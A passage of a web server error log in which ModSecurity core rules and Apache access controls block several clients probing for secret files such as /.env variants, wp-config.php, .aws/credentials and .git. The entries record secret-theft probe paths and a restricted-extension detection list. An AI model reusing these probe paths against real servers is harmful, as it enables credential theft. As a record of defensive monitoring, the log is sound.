"platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abzLWLDLwCKZPBqri3XZuAAAAAc"]
[Fri Mar 20 05:21:44.585641 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abzLWLDLwCKZPBqri3XZuAAAAAc"]
[Fri Mar 20 05:21:44.585803 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abzLWLDLwCKZPBqri3XZuAAAAAc"]
[Fri Mar 20 05:21:44.585954 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abzLWLDLwCKZPBqri3XZuAAAAAc"]
[Fri Mar 20 05:21:44.650846 2026] [authz_core:error] [pid 2817637] [client 93.123.109.214:35380] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Fri Mar 20 05:21:44.799946 2026] [authz_core:error] [pid 2817637] [client 93.123.109.214:35380] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 05:21:44.821753 2026] [authz_core:error] [pid 2817637] [client 93.123.109.214:35380] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 09:04:59.970276 2026] [:error] [pid 2815710] [client 45.148.10.231:57074] [client 45.148.10.231] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abz_qzQ9Th-2Y9b0JRd1hgAAAAE"]
[Fri Mar 20 09:04:59.970486 2026] [:error] [pid 2815710] [client 45.148.10.231:57074] [client 45.148.10.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abz_qzQ9Th-2Y9b0JRd1hgAAAAE"]
[Fri Mar 20 09:04:59.970644 2026] [:error] [pid 2815710] [client 45.148.10.231:57074] [client 45.148.10.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abz_qzQ9Th-2Y9b0JRd1hgAAAAE"]
[Fri Mar 20 09:05:01.272292 2026] [authz_core:error] [pid 2817639] [client 45.148.10.231:57080] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Mar 20 09:05:02.164381 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abz_rknH70iMTzyPh3kWVgAAAAY"]
[Fri Mar 20 09:05:02.164548 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abz_rknH70iMTzyPh3kWVgAAAAY"]
[Fri Mar 20 09:05:02.164689 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abz_rknH70iMTzyPh3kWVgAAAAY"]
[Fri Mar 20 09:05:02.232592 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abz_rknH70iMTzyPh3kWVwAAAAY"]
[Fri Mar 20 09:05:02.232705 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abz_rknH70iMTzyPh3kWVwAAAAY"]
[Fri Mar 20 09:05:02.232854 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abz_rknH70iMTzyPh3kWVwAAAAY"]
[Fri Mar 20 09:05:02.233008 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abz_rknH70iMTzyPh3kWVwAAAAY"]
[Fri Mar 20 09:05:02.706262 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abz_rknH70iMTzyPh3kWWAAAAAY"]
[Fri Mar 20 09:05:02.706460 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abz_rknH70iMTzyPh3kWWAAAAAY"]
[Fri Mar 20 09:05:02.706837 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abz_rknH70iMTzyPh3kWWAAAAAY"]
[Fri Mar 20 09:05:02.870884 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abz_rknH70iMTzyPh3kWWQAAAAY"]
[Fri Mar 20 09:05:02.871065 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abz_rknH70iMTzyPh3kWWQAAAAY"]
[Fri Mar 20 09:05:02.871256 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abz_rknH70iMTzyPh3kWWQAAAAY"]
[Fri Mar 20 09:05:02.938561 2026] [authz_core:error] [pid 2816018] [client 45.148.10.231:57146] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 09:05:02.991031 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abz_rknH70iMTzyPh3kWWwAAAAY"]
[Fri Mar 20 09:05:02.991200 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abz_rknH70iMTzyPh3kWWwAAAAY"]
[Fri Mar 20 09:05:02.991361 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abz_rknH70iMTzyPh3kWWwAAAAY"]
[Fri Mar 20 09:05:04.367807 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "abz_sEnH70iMTzyPh3kWZQAAAAY"]
[Fri Mar 20 09:05:04.367997 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "abz_sEnH70iMTzyPh3kWZQAAAAY"]
[Fri Mar 20 09:05:04.368162 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "abz_sEnH70iMTzyPh3kWZQAAAAY"]
[Fri Mar 20 09:05:04.421247 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "abz_sEnH70iMTzyPh3kWZgAAAAY"]
[Fri Mar 20 09:05:04.421419 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "abz_sEnH70iMTzyPh3kWZgAAAAY"]
[Fri Mar 20 09:05:04.421600 2026] [:error] [pid 2816018] [client 45.148.10.231:57146] [client 45.148.10.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "abz_sEnH70iMTzyPh3kWZgAAAAY"]
[Fri Mar 20 15:01:16.051314 2026] [authz_core:error] [pid 2815712] [client 162.158.86.142:13510] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:16.051586 2026] [authz_core:error] [pid 2815710] [client 162.158.86.142:13503] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:16.052975 2026] [authz_core:error] [pid 2816018] [client 162.158.86.254:13006] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:16.058586 2026] [authz_core:error] [pid 2815709] [client 162.158.86.143:11588] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:16.059835 2026] [authz_core:error] [pid 2815713] [client 162.158.86.142:13502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:16.063642 2026] [authz_core:error] [pid 2822566] [client 162.158.86.254:13007] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:16.071610 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab1TLEnH70iMTzyPh3kWiQAAAAY"]
[Fri Mar 20 15:01:16.071750 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab1TLEnH70iMTzyPh3kWiQAAAAY"]
[Fri Mar 20 15:01:16.071872 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab1TLEnH70iMTzyPh3kWiQAAAAY"]
[Fri Mar 20 15:01:16.072896 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab1TLKx8_pxqReT7SyGPEgAAAAM"]
[Fri Mar 20 15:01:16.072988 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab1TLKx8_pxqReT7SyGPEgAAAAM"]
[Fri Mar 20 15:01:16.073100 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab1TLKx8_pxqReT7SyGPEgAAAAM"]
[Fri Mar 20 15:01:16.083755 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1sQAAAAE"]
[Fri Mar 20 15:01:16.083864 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1sQAAAAE"]
[Fri Mar 20 15:01:16.083988 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1sQAAAAE"]
